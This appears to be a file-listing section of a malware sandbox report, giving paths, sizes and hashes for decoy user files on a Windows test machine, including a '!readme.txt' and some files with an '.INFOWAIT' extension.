C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GkFwBZ26Jl.docx	7.29 KB	MD5: 6d93782ee9978fdcac19d92f830d200d SHA1: 406a051b7d48259cb61c5e48e3cd6c8f810c7eaf SHA256: c30dac4f9a42c2b6405d25d34a0a0ad7547cebd0d29ad2468ca32bcd34d93fdd SSDeep: 192:L5WMABylzncxrURkDxON385Vp9T+6M+B8FgV:L5WMAYVIwRkp5RaD+Is	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\kuUk4.swf	74.14 KB	MD5: 728cb8a1d93817fea702465b1f8c9a86 SHA1: fcae8735a5974615b721b363a8f990f1f5fb2bad SHA256: 9149fc0022e51388353b7db461f541a8b5837c1955f0993d9f347a0548d9d2b3 SSDeep: 1536:duy5B3Jccvzoi1bFFrCeJwio+TCin7PVI/KMmD/u40Y74Do26Qghb/f38mCv:8yxs0bj3Jw+PV+Wu402ucD38mM	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	181.00 KB	MD5: 49a86c0ed098ae60dfa66c5b959bc3b6 SHA1: 12c31e174cb0f17205b1080fe8c0c8f07aa5bee5 SHA256: ffd0cea8ebd7e55200ef906edabb8976a83fa22fabb533a4c86317262802895b SSDeep: 3072:deAoIoh1PP9XFTZDgAbL6qr+VnrtBowm02haKGDBmjJBKzAD3FaOuBlTvo54Kms1:cAvoh1Pp0xrtBINWBmjJB7FaOuBlTw5r	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\YzRpjUWu6VDm3TLDV.pptx	50.41 KB	MD5: 85e3b48c4eb5f104c634675842f1a99c SHA1: cb047a7a82213c3b252cde5fd4a81a0e7467a2c0 SHA256: db31e9475e7576ef9517e1c6e8c2de9c534a12f2230607b585ade4dc2dbbf47b SSDeep: 1536:oB2JabNS8u+1bnJ+5Iba55QJX7Mus+z+hkwqiAY2DCAj:82J6N9X1bn4IbL1s9hrqHDCAj	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\aI-hq-hLGIh9RDS.xls	91.83 KB	MD5: fbfc4dab413a58ae90139411ba25468f SHA1: 4a2b155668e6626e6d9d6ecdb56facc5e46f4859 SHA256: ddf4ce8d607b526954aa89bb363a7b3334373de6421f16d4e955dfb8523942d5 SSDeep: 1536:D5VvuZxqmJ/nnc6c7s0aLjSAn2EPUiW8CY3TeXJZsWG4LbKzrsShwpWC5S:lVWZxqK/c3dayAoiDC2eXzNMMSCdS	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\CrDx78k.mkv	80.92 KB	MD5: c5c12d7e2aa948d13ee6169a32cc3039 SHA1: 8f2d344c72da2a0d124274f8f763be6020115758 SHA256: 0c805eeea776413dfffd0e8a030c91bca7cf8974fc1f1ad9ad82e9997680df62 SSDeep: 1536:ukI7/ROOCpIuXG/5jBnOJlZL+3fmMrLdpxzRVusCICHUVjQ3kZaMAzhmt:vgROOCphXG/9BI5MVPzRVuNBHakvMAze	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\v7CbnDwOOLwRsSR.xlsx	2.08 KB	MD5: 652580ed29f9410bf70682557851870c SHA1: 640de85cf1593f968a8f8bfa9b5914ec319c1179 SHA256: adc65ba9ff3316d2b4f7e72035f7b6baa2f4491fedfc30211c9ee52c1ed31919 SSDeep: 48:6UzmvFACTXmEWN+c1PfYes1a7ynXi6XXJ3N9g6aS:6UzEuIWEQ+2nVs1aeiqhh	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\laJ7 XG6mvY9a4Oq.mp4	46.41 KB	MD5: 2230b222113558c2396c9f892fb34813 SHA1: f820f883b27ac32bd0c2e8e65b1fba518f66fc9c SHA256: ed92faf2d38435b6649bdb10e0c788decebf59f925f795a3c3fda30a42be1738 SSDeep: 768:z+clsVlP8WahWbFMVAPFHePzZorbN/+DvJGhzWxxDqA7qXEIF5HScP0:zRsVlP8dYbFMVAd+bGx+1GegE+5yL	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\LcNIbb5Xdpy1cT0Voq.flv	60.32 KB	MD5: 7173acbd08f95d2b2b0298c100ea8271 SHA1: 28420cff594bc55df7d36d7e3c35b5db88c7bc80 SHA256: 7cb226702e4f3abb2e61dcbfed7d1542d4dc0e0a10f7c78c6b6d80b32c811eb3 SSDeep: 768:DXmX0m13Kb/4KgaQsa9jqGEg9nLXi30BhRO8egLQP4ABCKxMOeRguvANGOz6wbLV:T0DcEKFQsIjYmnLSEB51XYYdvADzlemJ	... File Actions Show Properties Download
C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrUpd10110_MUI.msp	10.00 MB	MD5: 493d0abc21f77c01c73e8e65bf6ca6e8 SHA1: 5bbe66e6b92a48948a78a25ace875c2394c067ae SHA256: 62562987168930eb3a3d131ddc343910c0ea2221bdb6a46860aa1dc7c675ec89 SSDeep: 196608:0n680fUIyyPHgvDXadSLsS8nQsiAESOsYnwZrja9segf:0ndkUaovsItAqpnevIu	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	0.13 KB	MD5: 0968f6bba2ef99cea85be449cca4613c SHA1: b951eb79543439aa49d73eb27a7f17f6b64983e3 SHA256: 54b646ed7ed60e410d779fea59411ce2affdeb1d4c91235d8011d0c6c14dbe30 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub+TnHs:afwSkeMRRkPDz58dz6vtkhGY	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\4DWhN6RhpgdCQKemK.gif	6.47 KB	MD5: a285241789dfab34520126dc722c18ea SHA1: 62dfd9e5925a717c7694b7543e3b68f2f8d00ca0 SHA256: 17cb7c540c219508415cd0ea5a98981e8db1310a2beafdad4a87f69a68013667 SSDeep: 192:/pAk29Qgb7d1/Il8DmdPzN6r63eYwoRZcpFPe:7Zgvd1/IWCdrN6u3RFRmvPe	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	0.13 KB	MD5: 5dc6e3b7f639899d29b173e41710326a SHA1: e6e901c81425d539473a9238fe47befc29834a34 SHA256: 2beaca35fcd496ce6b48016677fbcc97622067ab8b4694833700fa9ebac71d76 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0UQ7Ks:afwSkeMRRkPDz58dz6vtkhKd	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\ni0Jgy12uVbTOlRR.mkv	3.49 KB	MD5: 277ceb669acaa0c932ec66d476a6c649 SHA1: 7af0a6b8708feeac73df39277d39c11be4ca05cf SHA256: 4e525e1171c99e4293130a389ecbb01ba1a626e56ed591c2d6cecee6d5dbc04a SSDeep: 96:wapFuCySjWOhM/zJb0B/I5Ng1Ks3AIWu27Gm/PQcxw:P+OaN6Ivg53AHuAPQca	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Links\desktop.ini	0.57 KB	MD5: 9a13388d39edf84eec1b5d5af41f96b1 SHA1: 5b00ae3fbdc0c32de83c3ce2a1493a70cdd3cebf SHA256: 6bbe6d1f1cb399732f360661c658fee6bf0ffd0aec7934918d5948345b97b897 SSDeep: 12:ilZ9RF+tHms0astiM9uG8X09MbQggUC5+u5f2K/YfMsSyY9rAYwFtiljA7ey:il32hsaTXdDmku9GfSyY9rFwFtL7R	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\y1mkaun.wav	42.47 KB	MD5: f6e8eff2b3c0a6bbe6533439a6c0b9b3 SHA1: ec215162b5f78d7d10f7ad6dfc56495b6f9396dc SHA256: faf1f771f3391747b951e80146bf2544990c053d2d33a77de5f53359e582bb65 SSDeep: 768:5vhF+eyQw1JhBGE9xawosPvN4CBg+4ICt+7ogT5zazjEnnHT0tX2txyL:5vhgQwxBDxawLPvN4XRHwogT5zwEngtH	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	66.78 KB	MD5: d322e6d604c9d3e06c8173e70b7841e4 SHA1: 165f3a8f91302369343713d6d4a0f53cc6afc124 SHA256: 77c6b6b39759379ec9c49d99f93973a256274e11e44652a7b3ea73b31d1edd2c SSDeep: 1536:yFSYM6nag0DTjuQx91wJIQvkbY4SVykUPRhd2YXNDAT5ya5op:yUYbfCTjB1wJIqVo7d2YX1ayaa	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	885.50 KB	MD5: 5e14fb212c9979fc3e4d07851dd2840b SHA1: ebc4c334102756ebbf760b7edf235eef2eb90314 SHA256: a8943a3d00f91a7d4d5db49d8987503126546fc6b27196f6af01dd2219424fba SSDeep: 6144:NXkD5gFG9dKsduN2sCWctvCQ0OGj2QELvMYI2q3ksedyPs3ETGpyIQEkmt3PNXM1:N0DOgduPFcZCQ0OnikseAPsJpfjt3PE	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\SNwh\3-Cn.ods	12.73 KB	MD5: 614de1af37a3e3ac5b4e9078aea20d9d SHA1: 2dcf544e68074e954bce8db7ffba8ed6b8b5c1e2 SHA256: 5bcefe145b62b78676af1014ed422a8e844164b76dee29d04be6cf20e3f4e0e6 SSDeep: 384:D7YNAGgSQu7pJ5MLPkm/mXHoPrPiW76WmER+E:/YoSQuFAsm/oIPrP9Nm2P	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\f 1Medb.mp4	93.59 KB	MD5: e479304ef879519247b6b0fe6a93b7e8 SHA1: 12f06586ed3cf077b9efccbbfbeafc7eb6b244e4 SHA256: 0f32b176276954afd82673230fd1411264c9da08547c7cac260c63d1a254173a SSDeep: 1536:9aJzi19mG5iwcFpnsg2Le182jhtU8W31uPUu2xcPDT5EYYNZAJHSV:9ag9m9V3sg382j48/2uPDT5ViAJyV	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\_Xt1XKuQQyohA.wav	56.10 KB	MD5: a6f0df8e140dfd3ee68f4f744d3162c2 SHA1: 93dbfbc023c0745314ed4ecde3b7e1670365ebb5 SHA256: c83b89fd7d3bdf3d1fc06253ab714b07baf1e3554929870937dadf5d04f7e1e3 SSDeep: 1536:6QnGbs4SFkdYf/mDFKYGxSlZLRP6ymJmV/cpswDpId:X1Oif/mRgkZLRLDaRi	... File Actions Show Properties Download
C:\!readme.txt	1.15 KB	MD5: 51844619594311f8f98385fa601ca7b7 SHA1: c7a29add814f2af4d84e23776fdf447c0f8a2f87 SHA256: 61538dd0a1732b6cd0dba2266b30bd8879b30cd8bd04aef465d22df2e1fd7ce6 SSDeep: 24:Xn1O0IlrjFgcYrJyoFRj3ZiaSj10SAzzcowhf+yPyDYj:lO0wl+4khmmXzcjSMj	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kDhx0.ods	52.15 KB	MD5: f59309c2d20ac22b11c106fd2d4e35fc SHA1: 3a621f217aac3ba4ceb3bac258ae671e294f5bd3 SHA256: 07646c7c67c4071ffbf0659de98640afe5ce7ba278007c17cd4c2c807e599491 SSDeep: 1536:DjOGsXdpcrrmR3TBpAODDhcIRmEcrNzyurr1:DPr8cyFirRhrh	... File Actions Show Properties Download
C:\ProgramData\Mozilla\logs\maintenanceservice-install.log	0.16 KB	MD5: e5033f8478a1a2c442362efce2d2e52d SHA1: ddc3da0f732d030aa1b3a8fedd202a1e9e9636d2 SHA256: 37dc58ad9f37062a700599d815a9f1ca2514354104a8244bb44ac12a4cb0e9c0 SSDeep: 3:ZWxgyb+0V9XMrHD+t4iI9m7OluCQFDDz6iRD23FoDbv9An:4bPaHmvxKlNqDDz6ic3FeD9An	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	1.15 KB	MD5: ae8ff95e1dca3ffa22d4f443ceb19453 SHA1: e42a68ce7d3c0ca08b7fc57d3027e5f9f06a93d0 SHA256: dd271d93d515f1649d5ad891e67cbf29808b08ffb62040287b79fc1d5f8ed82c SSDeep: 24:ILozN0UmhL6Kusu9lsBMcvfRpr+M2db0Wb2LzbxOdgpQ1K:IgLkCXsBLpMAWaLHDuK	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\FIhr5H47kz.pptx	56.99 KB	MD5: 32de629b63eb7cf8678f3d8d6178f735 SHA1: b408f4e9a79f03d9ae07afe8c8dbe2e96e1a1571 SHA256: 2c728e1750ba1fc63c51cddd188615cfe7f9de8d7a07e59b6b68cc8e3548a4fe SSDeep: 1536:oqDc7/Bt3RwPMa2coxki6G+hdYEjJ+gdNwe:ZDc7/dMTncki4hCEjJLD	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\7FDM.jpg	98.77 KB	MD5: 4b5905695813ae52f8d3bff26fb6c353 SHA1: adce055c8f142396487cf1d1884765c9a1f1e736 SHA256: e9e2cf558995d4a897c7fd27bbd6576493225dbb54cba6f55994ec7a34dc9739 SSDeep: 1536:pEnhu3XQibXr5TOv41Brvffturuvj7bPxxi+dXhFkKvO+kU6sosh9FRUT61ZO+MC:ptXBTOWJbfiaXhmKvONUxKTWK43N	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\OaJupVjMV.mkv	57.22 KB	MD5: ee5e2ab500d2caaae449a578bb34be38 SHA1: 60ddf8864423e2f8614a5707ddeed17ed70b9e68 SHA256: 6c064fb55cb4d542030169e6c3ffcaee8af9f7445b27df8f6a088a6804cb9d81 SSDeep: 1536:32zxMbGsK9vu28dZx/QkpnsZoJlvWDloS5yPdpoy4:3MqGsKdSx/NpwYvWDloSIP54	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	265.00 KB	MD5: 07250040883684ea3a6a673a554f07af SHA1: 3c7e633884f61753d081a72c6cb0250aa877489b SHA256: e729b421005415e34b134277262f731bad7dd9c67ba09d71f729c9a7810abef2 SSDeep: 3072:8WJWeFD2G8ILL67JF7orRo1IwBIeXSg1dfGKn3Gqa1ZH+p2I7dxz+tET:XS5FFUr+1IgXSEbGqa1ZGz+	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.EXCEL.14.1033.hxn	0.32 KB	MD5: 74c20505ae2b8fa9539dc1d2f6695928 SHA1: f5e72ece1641afeaca2d12215be55132bc85acbe SHA256: 3f190d5dc52134563494f960d69463197e53f0d338649722b036f401d82174ad SSDeep: 6:gnGbRY5SoynAMvV0xzNPn2JXq3K9fNIamKpCiGSOxje0IAZLcjEWHSFmOltPR2:KcRuyAMvyxzNvm6aHIamKhYje0I8cAWd	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\rRaXTMp.mkv	82.47 KB	MD5: ee04047116edbe1108bd0d8613b00499 SHA1: 1f210a8836a6760db347cdc0f6d6efed6b4fb534 SHA256: 25120f747c8607dcf9c186273c8073482d3fc04e20592d1244492a51ab5b300d SSDeep: 1536:uCGsgX14atVUOJPKOyXXf9lt7j6OpKPDaPUwoVZrewx2q2q:uUgaatVJJPk+OpKPDaPUxZLx2qV	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	0.22 KB	MD5: 9aa7beff69eb1ea4b633bcd5cd6b2fcd SHA1: b2b7b56481a66900caa24136ca29b6388b0a74d0 SHA256: 689a36e501047514f0628abf34edc77d7ee81b8ea233a015b1cff8b56d6b3864 SSDeep: 6:afwSkeMRRkPDz58dz6vtkhxcstYS3ePZqBP8bwAgO3h4:qx0Hk7z58Nhxvxvqc	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\POzUPkpR60DTM.xlsx	46.74 KB	MD5: 547e407b0afe0196cf73bbb52f509cd8 SHA1: 988292f1f9ea1caef35f9db45dd9059b51660f55 SHA256: 8ff1afe8c3cd546a4c434414aa4425104362785c35f048bf284e9a0de8f72d00 SSDeep: 768:6G0Dy5V/nno6zg5iINDNmBAArcZkm9gtDC4m8xkVgHeI1UMbuJdzHW0K1sYaBqPh:6G0GX/no6zAOukmlz8xHu+uvL020c2Xx	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	0.82 KB	MD5: ec7078f4002b29e214aeb966614c2bbd SHA1: 20381d7fb985b037b8e8ac07dcc4dedc520a1204 SHA256: 8a5078fab5b4d6da866c34b03cce5c6e521268948ee24b1b99c738c659b6d7f7 SSDeep: 12:A7+RjscLXG7HscXEdTtpRAohXORc+D9HM7s2HC4B888LsWWNS0D8L8xdz/j:327McXEdJpLhXO2+L27B888+SZ4	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\8E9H31N.mp3	39.80 KB	MD5: 990abfd7e9084d1a3debf0ffbd2f29b9 SHA1: fcc1baf33e2861b6241dc60d42e5ef42ed97dbcb SHA256: 1f750a44ca8065c7d0431622986c1b8d9e0702a0bafcf2e3af3abd0081253e53 SSDeep: 768:8h+Dh27s37XQmeMfi4R+ohFzeY0PN4HGmmlRKB862yJYkd5Wo9Od4yH:t1XQm364NLzeY0PNmdmq862cYktx4	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\OFFICE\MySite.ico.INFOWAIT	24.62 KB	MD5: 7d99554b26dad5a09d87d60feec7b79c SHA1: 970aed6e9e2d8d0a96b999193f3b6ff5c392adc7 SHA256: adda5d3201da9d01c34fb00c5c2fc51add5511fe17cdf21c0ee3ef7924c43362 SSDeep: 768:Mu0Qp6Zdjwn7AZX+1RFoaYAJSw2n+v/kF4soh:sQQdjw7Al+1RilySwp/kF43	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\O89VrUgck0WGUK_Y\Hz-AF2m p5AxcZJOR.mkv	46.88 KB	MD5: 034e3460aea5973c8ef22f36895f5d15 SHA1: 8629ac2cc3be8041a68bfab0c825c6d6f9049b6e SHA256: ace4b7cdf930e7fbf6c566a7736241ff0254402edc69d262596aff4f040a3ccc SSDeep: 768:YKtLUoNuuSrjkP2KwAag7H5U2E2TcK8+Xl+UB30clpDYzCmUTib6BedIxQGAVjU1:YoLVubkjD62Um0E0Sq6BD6MHh	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\JAPSpnBZPTk8W3utGB.flv	80.49 KB	MD5: d5210b0575fd77695438be74990b281c SHA1: 9fd302e941d5c85db5567b018c719f9c3bbf2549 SHA256: dfa395608619ec251ec2a2e16d00a0c8c3059669263f8251ac7b5f742f2853cf SSDeep: 1536:jYfsUbWUOBgIBTFjruiJ0qa5zN6iQW9KBsvJvRCq/s8kzevcCBOL6:sHuR5JSpNcW9KBsv5EIs8kzi66	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\mF_q7P7.swf	4.63 KB	MD5: e523db425153a5798acf11c823785e64 SHA1: 6f30c16af0ea454fcd8d9fc59718b564ca8bbfc7 SHA256: 63f417a3be51097c2f1712083928583af8ee2767a5ed233c9de0b29ff3e07bde SSDeep: 96:d6LbsPAlpBryteDKDr37y/wW5m+N4WDkvcrvJyoFAQ2asT:d6LbsCr3DWy/vhN4Gkuvia2	... File Actions Show Properties Download
C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MKWD_AssetId.H1W.INFOWAIT	217.50 KB	MD5: 3a5d120dc4aca144e7d94e0fad97fa36 SHA1: 754b5f4644b7f29af6bc879e411266515df1b64c SHA256: 4e429fb68ae26e8839246155a7f6c49243aef74126587a51ba1c26c56174ae23 SSDeep: 3072:cWJWeFD2jz05HswZjZ/RGhFvWDflEOp3UFOF1C3v6yLZSDYu0YiESYad/A51G6t:329wZl/iFODEFOmSsZi0d/JA	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\kJFrd7NImQEQs.m4a	89.85 KB	MD5: f94cf9584a7ea2195f9b91ac4d6f9ba0 SHA1: 102262910bd16a28647866c43f8097af6957e876 SHA256: 72f8f05e03fea3fa1b2aa74b49c58caf638d60a95a8a73db1efddb46ceafad15 SSDeep: 1536:GjjeFzBeEsOoEcFDD+l2v1UAvUfI6pPOr3xrafojy0Pv3CjCMhkZNjWZO6OdvLw:GHew5Ex4v1Tvg5euwjy0Pv3CjCM0jW0C	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\M3mvj.m4a	96.67 KB	MD5: 3bb1fd8a83d11cc1586c99cf8bdd2916 SHA1: 32db97bed36e0682a35bdc51231a85c2590a6d39 SHA256: a5978ed963a5230f860cbb56c0d903af3297261c7d85dc5e6f73a519302d7f51 SSDeep: 3072:cSJYgGMCsMXtEPAI9xnbyx9w198Gmi2l68e7:+tFtEznnbyx9E2wV7	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat	32.00 KB	MD5: af313f0bd66b8a14613509d051ad4e9a SHA1: 93a043e3c39ae0d83c4fb9a91826ed5d7fcf982c SHA256: 4048636eb5c6462e8c6c095802ae85741cb2224ff2cc0e424f7bd33f5d6a5087 SSDeep: 768:t8Wr37qMWe38wDxUuKugphTjO9yF52bXmqaohC70COE9O6LvEYsTcR:t8Wb7qMWe38wD2vu8VjO0WmWC70XicZA	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8oeI6XU5 vjIz.avi	51.28 KB	MD5: 5bc4314510ce1691bebdc5a8df6fa25b SHA1: e800902a8f1219253ffa6072c94aad7dbc84a99e SHA256: b2a41a6fdd9a805af700156e2c7bc0523bb8c18f9b87641e615bc175551195f2 SSDeep: 1536:zottfiUrADsBBqTPfzEfwytQAL/OaMW6D7qf7SnLjFzb16PCRS:zYtfiRw2ExQA/OJD7qfMjFvICc	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\IEv7z27qsVTekHpr.bmp	83.15 KB	MD5: 70a930d0db315e7b839eee7f667328c5 SHA1: a514d352ffe517102437be7f6749ba7517f6a6ab SHA256: e8aa0cf5b165875b3dd2cc5b0786d77631eeb1976ca4b473083dcd94045aefa4 SSDeep: 1536:eHeB4nvqIMjRyjt2E8ZVpX027vENcVkg6VzvkBjaQsSLrZ8qQ:eHq4nvqLR0ngV9l7ecmg6hvkFXJR8j	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\tkO6bl.odp	72.50 KB	MD5: 0dddc271422c44b67cf0f7da4f15d87e SHA1: 32a4d30a349deafaf15529017b53b61479ee3a6a SHA256: 866058b5158cae85bf11e47816ae06d670b3b98d124c25ac33140f02a06ab2c3 SSDeep: 1536:bp/YCvbYwH1BpNW17vqI11AknFVL7hUkuacPCRqhAagqwT+jIvOIJTWjMLU3p:t3DYwH1BpM17v/3/nFVJUkkCRvqwT+JV	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	0.13 KB	MD5: 3226d49b2e883791c8c235930573aef1 SHA1: 495dde4429f150e6e258d81e742e2854c0153891 SHA256: 3c22216e7e1f1d867375f055022bd8fabbdffef2f838883815af74507f135168 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0VWjus:afwSkeMRRkPDz58dz6vtkhkW9	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\4fONS\0XQBmq5ckaU.mp3	51.76 KB	MD5: c1c15ab2218c229daaa135a50192d6f9 SHA1: 8881dd50423b5556a7ae2d6234a48a50607667c4 SHA256: 56ad5b2d265ff4e957f6fdd5db02df9e28ddb2557062b33a092c4d34bc855f40 SSDeep: 1536:hWBjuaMtDlrVIH5MLXHRsQpQH8QdxPf98HOuCX:hWBErVIH5MLXHRDWcQdhQMX	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.POWERPNT.14.1033.hxn	0.34 KB	MD5: ade501aea2d5c476561c5d38f2d3b036 SHA1: 1856432c18e61a43c5a6b9013ac757e77a62825a SHA256: a07deb28a292a02e1a6feb40ba9146e041e81efbf013999a59acfa987dfc70a6 SSDeep: 6:gn9+R19FKs6MmH6WM9356uawQkCqvm2f7jDbDy8JImcI35mWTap:K9+XF6RsY9Nqvm2fPDbDBXnTap	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\Hx.hxn	0.38 KB	MD5: a1c2a6f5427cdcb2b9b808f8de27e6c2 SHA1: c5e79634929589b0494c3ed2dfae3b61193d77d5 SHA256: ec5edb69f46d5ebe76ec0f6766bd1acde68997c97015d41aeaf15c494142765e SSDeep: 12:K/B7SZkjamfW3P6WZcMiDm5EKCAP6SWmVlXQu6f:K/BYkjawCF2FKWSpif	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	568.10 KB	MD5: 2362eddbe4b922880af9a87d2f984f86 SHA1: e03cb27404dbecccb13843f2613c0edc68a7c374 SHA256: cd5075db7d89a7ec60acd45eb70e7b2a4a83002fc9cc3809e4e12b53b44648b9 SSDeep: 12288:iUivUNxhsOOQCSHvf8Y4hyMPezVNK9TcS5RyjDUI6Eh/MOhTh:iPehWsMPgyTx6jDUbE2Id	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\ya4k9CP4ga90mFZW.wav	18.91 KB	MD5: b710f71efac3345d7f735163da61db66 SHA1: 8ba69f7d6792f9d4cf953158e92739c82aeddcd6 SHA256: 6fbe14f82b523e0ec2001e5d13086362b69dc3687eb15ba17d0d710f9eeeeac7 SSDeep: 384:g9vZyn0s/6j8oAF4H8BOyKlIyab5QV+BOqDuKk6Wj+id1ToC7S:g9vZyBijRFdIy6LBOIWKn	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\SXoi3O7UHlm4-KqaOQbg.avi	86.52 KB	MD5: 3cec3b51778fd1de3bbfe97ec879490e SHA1: bec57f13001e596d1300f0c79baab6eabb314e64 SHA256: 854da9ec0d29746f61364059ce15d62bb7058a4de2c3079c73dfe1766a856c80 SSDeep: 1536:XnSEO0U3iraz6kV+S+HKz6/s4wTtXAAbP2PHjItYJyy1LxCAjFdmO:3NO0Uyraz6e+HKtbX1CP8tIyy1xh8O	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\luqHM\IMEhPArBi5zDx-qN3xQn.png	74.21 KB	MD5: be7a7b0639c35531d68b178d2c88a34a SHA1: b2080ffe2ceb07866955018f851f04a2eee17690 SHA256: 50f211134e2595550c06c7338187078b714cfcd28d510a9568e25e3bb9be9312 SSDeep: 1536:BOnHpf9jjp86UfdbGiQ9z/tyGok3o+Weu6MTuhNwCXGI0F8FEXWF6d:2TqVs/tyGm9/TuhNLXGZF8FEXWg	... File Actions Show Properties Download
C:\Boot\BOOTSTAT.DAT	64.00 KB	MD5: cc231cdcce8e6badfa43782c660b14c4 SHA1: 95174af3f15c23c2045c57bcfc42c29d50b6901c SHA256: 079c79bd6ec580c88c316e38e5aa3bc514055872483e91deb7c7496c444e59eb SSDeep: 1536:kbWb7qMWe38wD2vu8VjOLCGi9aWcC70XicZMAqhFgOfYEhJrqC9V8:2WJWeFD2G8ILChmRZ6hFg4RlqC6	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\xsTHwcnuDqWQ9Jfwv\u8Rrvn5zJ.jpg	93.65 KB	MD5: 19ca4ce9fc1ed17e5a48533007fc82ab SHA1: 752e79a46bd55d7c16b1cc19be1d126057063c25 SHA256: 96bed7a236ade6e5bbcb0a2410a0b6eacd198094628a42df5cba7e359a9f8959 SSDeep: 1536:yYkZu+J5Btc3erUmqyn0tiJ3Yx99h8enApADwQ/2nA3nIuFuDRpXGKxfM6IwfWmZ:yS+jBMerUq+ixKsuDwQ/9YiujxZDWU	... File Actions Show Properties Download
